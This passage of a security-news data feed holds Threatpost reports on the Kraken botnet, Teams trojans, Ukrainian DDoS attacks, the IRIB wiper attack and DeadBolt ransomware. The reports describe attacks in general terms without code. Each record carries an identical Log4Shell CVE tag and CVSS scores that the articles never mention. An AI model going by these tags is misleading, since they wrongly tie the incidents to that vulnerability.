post.\n\nUsing SmokeLoader to install yet more malicious software on targeted machines, Kraken is picking up hundreds of new bots each time a new command-and-control (C2) server is deployed, according to Simon\u2019s post.\n\nZeroFox came upon the previously unknown botnet, which was still under active development, in late October 2021. 
Even though it was still being developed, it already had the ability to siphon sensitive data from Windows hosts, being able to download and execute secondary payloads, run shell commands, and take screenshots of the victim\u2019s system, ZeroFox said.\n\n## Simple, But Multi-Tentacled\n\nZeroFox shared a screen capture of the initial version of Kraken\u2019s panel \u2013 shown below, the C2 was named \u201cKraken Panel\u201d \u2013 that\u2019s lean in features. It offered basic statistics, links to download payloads, an option to upload new payloads, and a way to interact with a specific number of bots.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17113451/Krakens-C2-panel-e1645115709526.jpeg>)\n\nEnglish-translated version of the Kraken C2 panel. Source: ZeroFox Intelligence.\n\n\u201cThis version did not appear to allow the operator(s) to choose which victims to interact with,\u201d Simon noted.\n\nBut the current version of Kraken\u2019s C2 panel, shown below, has been completely redesigned and renamed as Anubis. \u201cThe Anubis Panel provides far more information to the operator(s) than the original Kraken Panel,\u201d according to Simon. \u201cIn addition to the previously provided statistics, it is now possible to view command history and information about the victim.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17114005/Anubis-panel-for-Kraken-e1645116023649.jpeg>)\n\nDashboard for Kraken\u2019s latest C2 panel, called Anubis. Source: ZeroFox Intelligence.\n\n## Grabbing Cryptocurrency\n\nKraken\u2019s author has been tinkering, adding and deleting capabilities. 
At this point, Kraken can maintain persistence, collect information about the host, download and execute files, run shell commands, take screenshots, and steal various cryptocurrency wallets, including Zcash, Armory, Atomic, Bytecoin, Electrum, Ethereum, Exodus, Guarda and Jaxx Liberty.\n\nLater iterations have gotten yet more replete, with the author having added selective choosing of targets for commands (individually or by group, as opposed to the earlier version having only allowed a bot operator to choose how many victims they\u2019re targeting), task and command history, task ID, command being sent, how many victims the command should be sent to, the targeted geolocation, and a timestamp of when the task was initiated.\n\nAt first, from October to December 2021, the RedLine infostealer was inflicted on victims\u2019 machines every time Kraken struck. RedLine, an increasingly [prevalent](<https://threatpost.com/google-ppc-ads-used-to-deliver-infostealers/166644/>) infostealer, swipes data from browsers, such as saved credentials, autocomplete data and credit card information.\n\nThe malware has since spread its tentacles, though, both in terms of adding other infostealers to the mix and making its operators a boatload of dough. \u201cAs the operator(s) behind Kraken continued to expand and gather more victims, ZeroFox began observing other generic information stealers and cryptocurrency miners being deployed,\u201d according to Simon\u2019s writeup.\n\nAs of Wednesday, the botnet was pulling in around USD $3,000 every month, as shown in the screen capture below from Ethermine.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/17120117/mining_stats-e1645117292604.jpg>)\n\nMining statistics from the cryptocurrency mining pool Ethermine. Source: ZeroFox Intelligence.\n\nWhat does the operator plan to do with the new bot and all the data its infostealers are sucking up? 
It\u2019s unknown at this point, ZeroFox researchers concluded: \u201cIt is currently unknown what the operator intends to do with the stolen credentials that have been collected or what the end goal is for creating this new botnet.\u201d\n\n## Steering Clear\n\nZeroFox passed on these recommendations to keep Kraken from tangling up your systems:\n\n * Ensure antivirus and intrusion detection software is up to date with all patches and rule sets.\n * Enable two-factor authentication for all organizational accounts to help mitigate phishing and credential stuffing attacks.\n * Maintain regularly scheduled backup routines, including off-site storage and integrity checks.\n * Avoid opening unsolicited attachments and never click suspicious links.\n * Log and monitor all administrative actions as much as possible. Alert on any suspicious activity.\n * Review network logs for potential signs of compromise and data egress.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T17:28:02", "type": "threatpost", "title": "Baby Golang-Based Botnet Already Pulling in $3K/Month for Operators", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T17:28:02", "id": "THREATPOST:E8A3AD011F9759F38AAB48D776396878", "href": "https://threatpost.com/golang-botnet-pulling-in-3k-month/178509/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:44", "description": "Threat actors are targeting Microsoft Teams users by planting malicious documents in chat threads that execute Trojans that ultimately can take over end-user machines, researchers have found.\n\nIn January, researchers at Avanan, a Check Point Company, began tracking the campaign, which drops malicious executable files in Teams conversations that, when clicked on, eventually take over the user\u2019s computer, according to [a report](<https://www.avanan.com/blog/hackers-attach-malicious-.exe-files-to-teams-conversations>) published Thursday.\n\n\u201cUsing an executable file, or a file that contains instructions for the system to execute, hackers can install DLL files and allow the program to self-administer and take control over the computer,\u201d cybersecurity researcher and analyst at Avanan Jeremy Fuchs wrote in a report. 
\u201cBy attaching the file to a Teams attack, hackers have found a new way to easily target millions of users.\u201d\n\nCybercriminals long have targeted Microsoft\u2019s ubiquitous document-creation and sharing suite \u2013 the legacy Office and its cloud-based version, [Office 365](<https://threatpost.com/tiny-font-size-email-filters-bec-phishing/176198/>) \u2013 with attacks against individual apps in the suite such as [PowerPoint](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) as well as [business email compromise](<https://threatpost.com/microsoft-365-bec-innovation/163508/>) and other scams.\n\nNow Microsoft Teams \u2013 a business communication and collaboration suite \u2013 is emerging as an [increasingly popular attack surface](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) for cybercriminals, Fuchs said.\n\nThis interest could be attributed to its surge in use over the COVID-19 pandemic, as many organizations\u2019 employees working remotely relied on the app to collaborate. Indeed, the number of daily active users of Teams nearly doubled over the past year, increasing from 75 million users in April 2020 to 145 million as of the second quarter of 2021, according to Statista.\n\nThe latest campaign against Teams demonstrates an increased understanding of the collaboration app that will allow attacks against it to increase in both sophistication and volume, Fuchs noted. \u201cAs Teams usage continues to increase, Avanan expects a significant increase in these sorts of attacks,\u201d he wrote.\n\n## **Taking on Teams**\n\nIn order to plant malicious documents in Teams, attackers first have to get access to the application, Fuchs noted. 
This is possible in a number of ways, typically involving an initial [email compromise](<https://threatpost.com/microsoft-teams-tabs-bec/166909/>) through phishing to gain credentials or other access to a network, he said.\n\n\u201cThey can compromise a partner organization and listen in on inter-organizational chats,\u201d Fuchs wrote. \u201cThey can compromise an email address and use that to access Teams. They can steal Microsoft 365 credentials, giving them carte blanche access to Teams and the rest of the Office suite.\u201d\n\nOnce an attacker gains access to Teams, it\u2019s fairly easy to navigate and slip past any security protections, he noted. This is because \u201cdefault Teams protections are lacking, as scanning for malicious links and files is limited,\u201d and \u201cmany email security solutions do not offer robust protection for Teams,\u201d Fuchs wrote.\n\nAnother reason Teams is easy for hackers to compromise is that end users inherently trust the platform, sharing sensitive and even confidential data with abandon while using it, he said.\n\n\u201cFor example, an Avanan analysis of hospitals that use Teams found that doctors share patient medical information practically with no limits on the Teams platform,\u201d Fuchs wrote. \u201cMedical staff generally know the security rules and risk of sharing information via email, but ignore those when it comes to Teams. 
In their mind, everything can be sent on Teams.\u201d\n\nFurther, nearly every Teams user can invite people from other departments or other companies to collaborate via the platform, and there is often \u201cminimal oversight\u201d over these requests because of the trust people have, he added.\n\n## **Specific Attack Vector**\n\nIn the attack vector Avanan researchers observed, attackers first access Teams through one of the aforementioned ways, such as a phishing email that spoofs a user, or through a lateral attack on the network.\n\nThen, the threat actor attaches a .exe file to a chat \u2013 called \u201cUser Centric\u201d \u2013 that is actually a trojan. To the end user, it looks legitimate, because it appears to be coming from a trusted user.\n\n\u201cWhen someone attaches a file to a Teams chat, particularly with the innocuous-sounding file name of \u2018User Centric,\u2019 many users won\u2019t think twice and will click on it,\u201d Fuchs wrote.\n\nIf that happens, the executable will then install DLL files that install malware as a Windows program and create shortcut links to self-administer on the victim\u2019s machine, he said. 
The ultimate goal of the malware is to take over control of the machine and perform other nefarious activities.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T14:11:48", "type": "threatpost", "title": "Microsoft Teams Targeted With Takeover Trojans", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T14:11:48", "id": "THREATPOST:6675B640474BF8A8A3D049DB0266A118", "href": "https://threatpost.com/microsoft-teams-targeted-takeover-trojans/178497/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:54", "description": "On Tuesday, institutions central to Ukraine\u2019s military and economy were hit with a wave of denial-of-service (DoS) attacks, which sparked an avalanche of headlines around the world. 
The strike itself had limited impact \u2014 but the larger implications for critical infrastructure beyond Ukraine are worth noting, researchers said.\n\nThe targets were core entities to Ukraine: the Armed Forces of Ukraine, the Ministry of Defense, Oschadbank (the State Savings Bank) and Privatbank, the country\u2019s largest commercial bank, servicing nearly [20 million](<https://en.privatbank.ua/about>) customers. Oschadbank and Privatbank are considered \u201c[systemically important](<https://bank.gov.ua/en/news/all/natsionalniy-bank-onoviv-perelik-sistemno-vajlivih-bankiv>)\u201d to Ukraine\u2019s financial markets.\n\nAdam Meyers, senior vice president of intelligence at CrowdStrike, said via email that the attacks consisted of \u201ca large volume of traffic, three orders of magnitude more than regularly observed traffic, with 99 percent of this traffic consisting of HTTPs requests.\u201d\n\n## **What Happened?**\n\nBy overloading targeted servers, this kind of DoS attack ensured that end users couldn\u2019t access their websites, bank accounts and so on for a period of time. As Ukraine\u2019s Center for Strategic Communications noted in a Facebook [post](<https://www.facebook.com/StratcomCentreUA/posts/290808713119116>), some Privatbank customers found themselves \u201ccompletely unable to access\u201d the company\u2019s app, while others\u2019 accounts \u201cdo not reflect balance and recent transactions.\u201d\n\nSome customers received SMS messages claiming that ATMs were out of order, according to Ukraine\u2019s Cyberpolice, which [tweeted](<https://twitter.com/CyberpoliceUA/status/1493578811492950020>) the claim. Those reports, however, were debunked, [according to](<https://www.npr.org/2022/02/15/1080876311/ukraine-hack-denial-of-service-attack-defense>) NPR.\n\nCrucially, the attackers disrupted the _availability_ of these websites and services, but not the _integrity_ of any data. 
Thus, the transactions, balances and private information associated with bank accounts and military databases appear to be untainted, according to reports.\n\n[And, according](<https://cip.gov.ua/en/news/shodo-kiberataki-na-saiti-viiskovikh-struktur-ta-derzhavnikh-bankiv>) to Ukraine\u2019s State Special Communications Service, a \u201cworking group of experts\u201d convened yesterday to take \u201call necessary measures to localize and resist the cyberattack.\u201d All affected banking services had resumed by 7:30 p.m. local time on Tuesday, and the websites for the Armed Forces and Ministry of Defense have since been restored.\n\n\u201cThe DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks [seen in January](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>),\u201d Rick Holland, CISO at Digital Shadows, said via email. \u201cThey could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.\u201d\n\n## **Part of a Much Broader Campaign**\n\nWhile limited in impact, these events have come mere hours after the Security Service of Ukraine\u2019s (SSU) [reported](<https://ssu.gov.ua/en/novyny/zaiava-sbu-shchodo-proiaviv-hibrydnoi-viiny-v-informatsiinomu-prostori>) a \u201cmassive wave of hybrid warfare\u201d \u2013 [120](<https://ssu.gov.ua/en/novyny/u-sichni-2022-roku-sbu-zablokuvala-ponad-120-kiberatak-na-ukrainski-orhany-vlady>) cyberattacks against government authorities, and a fake news botnet of more than [18,000](<https://ssu.gov.ua/en/novyny/sbu-likviduvala-18ty-tysiachnu-botofermu-u-lvovi-pid-kuratorstvom-rf-siialy-paniku-ta-minuvaly-obiekty-video>) social-media accounts \u2013 all designed to \u201csystemically sow panic, spread fake information and distort the real state of affairs\u201d in the country.\n\nThe SSU attributed this wave of hostile activity to a single unnamed 
but obvious \u201caggressor state.\u201d\n\nLikewise, Tuesday\u2019s attacks have not been officially attributed. Still, their timing, as Russia mobilizes more than 100,000 troops at Ukraine\u2019s northeast border, is inspiring speculation.\n\n\u201cIt would be no surprise,\u201d wrote Mike McLellan, director of intelligence at SecureWorks, via email, \u201cif it transpires that they are the result of cyberattacks conducted by Russia, or by threat actors with a pro-Russian agenda.\u201d\n\nHe added, \u201cRussia has a history of cyberattacks \u2018designed to distract the Ukrainian government and critical infrastructure operators and undermine the trust among the Ukrainian population.\u2019\u201d\n\nAnd indeed, in the past two months, Russian advanced persistent threats (APTs) have been tied to an [attack](<https://threatpost.com/be-afraid-massive-cyberattack-downs-ukrainian-govt-sites/177659/>) on 70 Ukrainian government websites, a [wiper](<https://threatpost.com/destructive-wiper-ukraine/177768/>) targeting government, non-profit and IT organizations, and increased [attacks and espionage](<https://threatpost.com/gamaredon-apt-toolset-ukraine/152568/>) against military targets.\n\nIt\u2019s also worth noting that the 2014 Russian invasion of Crimea [coincided with](<https://resources.infosecinstitute.com/topic/crimea-russian-cyber-strategy-hit-ukraine/>) an outbreak of the [Turla virus](<https://threatpost.com/solarwinds-hack-linked-turla-apt/162918/>), and targeted espionage attacks against government agencies, politicians and businesses.\n\nOthers, however, noted that there could be many beneficiaries to the fog of potential war.\n\n\u201cWhat could be a more likely scenario [than Russia carrying out the attacks] is that other countries like China and Iran take advantage of the chaos and fog of war to further their interests and conduct their campaigns against the West,\u201d Holland noted. 
\u201cAs the saying goes, \u2018never let a good crisis go to waste.\u2019 The risk of these types of false-flag operations could have unintended consequences, and you can\u2019t close Pandora\u2019s Box once it\u2019s opened.\u201d\n\nTim Wade, technical director and deputy CTO at Vectra, cautioned against hasty attribution.\n\n\u201cThere is no shortage of actors that could stand to benefit from chaos or disruption \u2013 ranging from criminal actors to nation states \u2013 and that, unlike Hollywood movies, real motivations can be tricky to unwind,\u201d he said via email.\n\n## **Could Ukraine\u2019s Problems Migrate West?**\n\nBesides the direct threat to Ukrainians, increasing cyber-disruption in the region could spill over to affect American and European countries and businesses.\n\nPrior attacks against Ukrainian targets have crippled companies that simply do business or passively interact with Ukrainian organizations. Famously, the 2017 [NotPetya malware](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>) that breached a Kiev-based accounting software vendor ended up causing [billions of dollars of damage](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>) to multinational corporations like Maersk, Merck and FedEx.\n\nGovernment officials have been warning of the potential for similar attacks directed at the United States government and its critical industries. A January [bulletin](<https://info.publicintelligence.net/DHS-UkraineInvasionCyberAttacks.pdf>) from the Department of Homeland Security (DHS) concluded that \u201cRussia would consider initiating a cyberattack against the Homeland if it perceived a U.S. 
or NATO response to a possible Russian invasion of Ukraine threatened its long-term national security.\u201d\n\nThe [_DHS and FBI this week also warned_](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUfnCpRAdaEZ-2Fzb6CvhwO2WfCysAcwxa-2FOx6Xho58-2BYfSYyLoJDjBKk191ALVSfQe7tKhtpt14nvCWvRWtjQ5ia-2Bxy-2FAHNuEWnCoDD4HJMf8OJPniUjq-2B73i7hrTuhggh8r40SSt8yAJN6BeVN-2BkmdzRhazj8-2BjAsse8M0ns4vlmM4yK8nCFV0oUzvOT01MzpXw-3D-3DEQ6l_ZRLSPEhX0sWy6v6-2FW4BoBGwvynWnvEEKCCoI2tE2RSv7Ap1BbaYTRGgOsmBtH3N8QKMiyASu9uND9imXoTFn2JxQFydFAQqAST8UQ4mPJ45BLqxiPCRq-2F8g1sIIIifFF67f6vand8CQnio175DMlDx-2BtZjU9X-2BUnk00U6HL2Yt4yyDbwA5dz19QLe0tu0POPLp-2Fgsr5OJD90lYAoTgrjHLrtnapc4YpMEy1t1oB-2FDSc0tf3yxTecOYhCatjqqOm4kJQYHeuGl-2BEr4Nvd1gCZbw27qOfv2B-2BBdgMuXjXMnP622px6wYmsEQxT8XmTUE4Kp48bq-2BYS-2BZ-2BxIiX-2Fk3HtqWfdoiM23ih4UUMDkfkykO0-3D>) of an uptick in Russian scanning of domestic law-enforcement networks and other American targets.\n\nSecurity researchers noted that it\u2019s important to be wary as the geo-political tensions continue \u2014 given that the chaos that would arise from a full-blown Russian incursion would provide plenty of cover for cyberattackers of all stripes.\n\nAs Crowdstrike\u2019s Meyers said, \u201cwhile there is no evidence of any targeting of western entities at this time, there is certainly potential for collateral impact as a result of disruptive or destructive attacks targeting Ukraine \u2013 this could impact companies that have a presence in Ukraine, those that do business with Ukrainian companies, or have a supply chain component in Ukraine such as code development/offshoring.\u201d\n\nWould the U.S. be ready in such a scenario? Last week, DHS officials [_told American cities_](<https://www.usatoday.com/story/news/politics/2022/02/08/local-government-cybersecurity-digital-threats/9208951002/?gnt-cfr=1>) that they were extra-vulnerable to wipers that could result in polluting a water supply or crashing a power grid. 
And it\u2019s worth noting that, according to [data](<https://www.cyberseek.org/heatmap.html>) from Cyber Seek, 600,000 cybersecurity roles across the nation are currently vacant, meaning that many organizations are understaffed for incident response.\n\n\u201cAre these attacks part of nation-state aggression? Or criminal opportunists exploiting a tense situation? Or just entirely coincidental? While answering with any certainty may be tough, what isn\u2019t difficult is drawing a clear line of sight to the significance of cyber-resilience as it relates to critical services and infrastructure,\u201d Vectra\u2019s Wade noted. \u201cToday, everyone operating something of value has a target on their back and we\u2019d all do well to prepare for the inevitability of the consequences of that fact.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-17T16:04:36", "type": "threatpost", "title": "Ukrainian DDoS Attacks Should Put US on Notice\u2013Researchers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-17T16:04:36", "id": 
"THREATPOST:1BE6320CDA6342E72A5A2DD5E0758735", "href": "https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:47", "description": "Footage of opposition leaders calling for the assassination of Iran\u2019s Supreme Leader ran on several of the nation\u2019s state-run TV channels in late January after a state-sponsored cyber-attack on Iranian state broadcaster IRIB.\n\nThe incident \u2013 one of a series of politically motivated attacks in Iran that have occurred in the last year \u2013 included the use of a wiper that potentially ties it to a previous high-profile attack on Iran\u2019s national transportation networks in July, according to researchers from Check Point Research.\n\nHowever, though the earlier attacks have been attributed to [Iran state-sponsored actor Indra](<https://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/>), researchers believe a copycat actor was behind the IRIB attack based on the malware and tools used in the attack, they said in a [report](<https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/>) published Friday.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cAmong the tools used in the attack, we identified malware that takes screenshots of the victims\u2019 screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables,\u201d researchers wrote in the report. \u201cWe could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.\u201d\n\nThe disruptive attack on IRIB occurred on Jan. 
27, with attackers showing a savviness and knowledge of how to infiltrate systems that suggest it may also have been an inside job, researchers said.\n\nThe attack managed to bypass security systems and network segmentation, penetrate the broadcaster\u2019s networks, and produce and run the malicious tools that relied on internal knowledge of the broadcasting software used by victims, \u201call while staying under the radar during the reconnaissance and initial intrusion stages,\u201d they noted.\n\nIndeed, nearly two weeks after the attack happened, news outlets affiliated with opposition party MEK [published](<https://english.mojahedin.org/news/iran-despite-utilizing-all-resources-after-12-days-regimes-radio-and-tv-networks-have-not-returned-to-a-normal-status/>) a status report of the attack claiming that state-sponsored radio and TV networks still had not returned to normal, and that more than 600 servers, advanced digital production, archiving, and broadcasting of radio and television equipment have been destroyed, according to the report.\n\n## **Spate of Attacks**\n\nIran\u2019s national infrastructure has been the victim of a wave of attacks aimed at causing serious disruption and damage. Two incidents that targeted national transportation infrastructure occurred on two consecutive days in July.\n\nOne was a [rail-transportation incident](<https://threatpost.com/novel-meteor-wiper-used-in-attack-that-crippled-iranian-train-system/168262/>) \u2013 which disrupted rail service and also taunted Iran Supreme Leader Ayatollah Sayyid Ali Hosseini Khamenei via hacked public transit display screens. 
A day later, Iran\u2019s Ministry of Roads and Urban Development also [was hit with a cyber-attack](<https://www.reuters.com/world/middle-east/iran-transport-ministry-hit-by-second-apparent-cyberattack-days-2021-07-10/>) that took down employees\u2019 computer systems.\n\nThen in October, an attack on Iran\u2019s fuel-distribution network [stranded drivers](<https://threatpost.com/cyberattack-cripples-iranian-fuel-distribution-network/175794/>) at fuel pumps across the country by disabling government-issued electronic cards providing subsidies that many Iranians use to purchase fuel at discounted prices.\n\nCheck Point researchers analyzed tools in the IRIB cyber-attack and compared them with those of Indra, the group believed to be responsible for the previous attacks in Iran\u2019s infrastructure. Specifically, a novel wiper called Meteor \u2013 which not only wipes files but also can change users\u2019 passwords, disable screensavers, terminate processes and disable recovery mode, among other nefarious features \u2013 was used in both the railway and roads attacks.\n\nHowever, though a wiper was used against IRIB, it doesn\u2019t appear to be the same one. Nor are the threat actors behind it likely the same, though a copycat situation may be at play, researchers concluded.\n\n\u201cAlthough these wipers are coded and behave very differently, some implementation details such as execution based on batch files, or the password changing patterns ([random sequence]aA1! for this attack and Aa153![random sequence] in Indra\u2019s case), suggests that the attackers behind the IRIB hack may have been inspired by previous attacks [that] happened in Iran,\u201d they wrote in the report.\n\n## **Claiming Responsibility**\n\nIt\u2019s still unclear who, exactly, the perpetrators of the IRIB attack are, however. 
While Iranian officials believe the Iranian opposition political party MEK is behind the attack, the group itself has denied involvement, researchers said.\n\nFurther, hacktivist group Predatory Sparrow, which claimed responsibility for the previous three infrastructure attacks, also affiliated itself with the IRIB attack via its Telegram channel. However, this is unlikely, as \u201cno technical proof of the group\u2019s attribution to the attack has been discovered,\u201d according to Check Point.\n\nWhat is known about the threat actor, however, is that due to the relative complexity of the attack itself, the group \u201cmay have many capabilities that have yet to be explored,\u201d researchers noted.\n\nAt the same time, their reliance on IRIB insiders may have been the secret to the attackers\u2019 success, as the tools they used are of \u201crelatively low quality and sophistication, and are launched by clumsy and sometimes buggy 3-line batch scripts,\u201d according to Check Point.\n\n\u201cThis might support the theory that the attackers might have had help from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills,\u201d researchers noted.\n\n## **Specific Malware**\n\nWhile researchers said they are still not sure how the attackers gained initial access to IRIB networks, they managed to retrieve and analyze malware related to the later stages of the attack that did three things: established backdoors and their persistence, launched the video or audio track playing the assassination message, and installed the wiper to disrupt operations in the hacked networks.\n\nAttackers used four backdoor strategies in the attack: WinScreeny, HttpCallbackService, HttpService and ServerLaunch, a dropper launched with HttpService.\n\nWinScreeny is a backdoor with the main purpose of capturing screenshots of the victim\u2019s computer. 
HttpCallbackService is a remote-administration tool (RAT) that communicates with the command-and-control (C2) server every five seconds to receive commands to execute. HttpService is a backdoor that listens on a specified port and can execute commands, manipulate local files, download or upload files, or perform other malicious activities.\n\nFinally, the ServerLaunch dropper \u2013 which starts both httpservice2 and httpservice4, each of which has a different predefined port to listen on \u2013 likely allows the attackers to ensure some sort of redundancy of the C2 communication, researchers wrote.\n\n## **Hijacking the Video Stream**\n\nTo interrupt the TV stream and play the opposition\u2019s message, attackers used a program called SimplePlayout.exe, a .NET-based executable with a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.\n\nTo kill the video stream already playing so they could deploy their own, the attackers used a batch script called playjfalcfgcdq.bat, which killed the running process and deleted the executable of TFI Arista Playout Server, a software that the IRIB is [known](<http://rd.irib.ir/documents/25760057/f39f659c-8a0b-42f3-a1e9-d716cd5b8afe>) to use for broadcasting.\n\nAttackers connected the dots with a script, layoutabcpxtveni.bat, that made the necessary connections to replace the IRIB video content with their own through a series of functions, including the launch of SimplePlayout.exe, researchers wrote.\n\n## **The Wiper**\n\nIn analyzing the wiper used in the attacks, researchers found \u201ctwo identical .NET samples named msdskint.exe whose main purpose is to wipe the computer\u2019s files, drives, and MBR,\u201d they reported.\n\nThe malware also has the capability to clear Windows Event Logs, delete backups, kill processes and change users\u2019 passwords, among other features.\n\nTo corrupt files, the wiper has three modes: default, which overwrites the first 200 bytes of each chunk 
of 1024 bytes with random values; light-wipe, which overwrites a number of chunks specified in the configuration; and full_purge, which does just that \u2013 overwrites the entire file content.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T13:46:04", "type": "threatpost", "title": "Iranian State Broadcaster Clobbered by \u2018Clumsy, Buggy\u2019 Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T13:46:04", "id": "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "href": "https://threatpost.com/iranian-state-broadcaster-clumsy-buggy-code/178524/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T17:04:20", "description": "DeadBolt ransomware has resurfaced in a new wave of attacks on QNAP that began in mid-March and signals a new targeting of the Taiwan-based network-attached storage (NAS) devices by the fledgling threat, researchers said.\n\nResearchers from Censys, which provides attack-surface management solutions, said they observed DeadBolt infections on QNAP gear ramp up slowly starting March 16, 
with a total of 373 infections that day. That number rose to 1,146 devices by March 19, according to [a blog post](<https://censys.io/deadbolt-ransomware-is-back/>) by Censys senior security researcher Mark Ellzey.\n\nThe current attacks harken [back to January](<https://threatpost.com/conti-deadbolt-delta-qnap-ransomware/178083/>), when the company had to push out an unplanned update to its NAS devices, one that not all customers welcomed. The update was meant to clean up after DeadBolt attacks that were greeting customers with the ransomware group\u2019s screen when they logged in, effectively locking them out of the device.\n\nThe new wave of attacks ostensibly follows the same pattern as January\u2019s wave, but the majority of the victims are running the QNAP QTS Linux kernel version 5.10.60, Ellzey said. That\u2019s a later version than the update ([QTS 5.0.0.1891](<https://www.qnap.com/en-us/release-notes/qts/5.0.0.1891/20211221>)) pushed out to customers in January.\n\nThat said, \u201cat this time, Censys cannot state whether this is a new attack targeting different versions of the QTS operating system, or if it\u2019s the original exploit targeting unpatched QNAP devices,\u201d he acknowledged.\n\nMoreover, the new infections do not seem to be targeting a specific organization or country; they seem to be evenly split between subscribers of various consumer internet service providers, Ellzey added.\n\n## **D\u00e9j\u00e0 Vu for QNAP 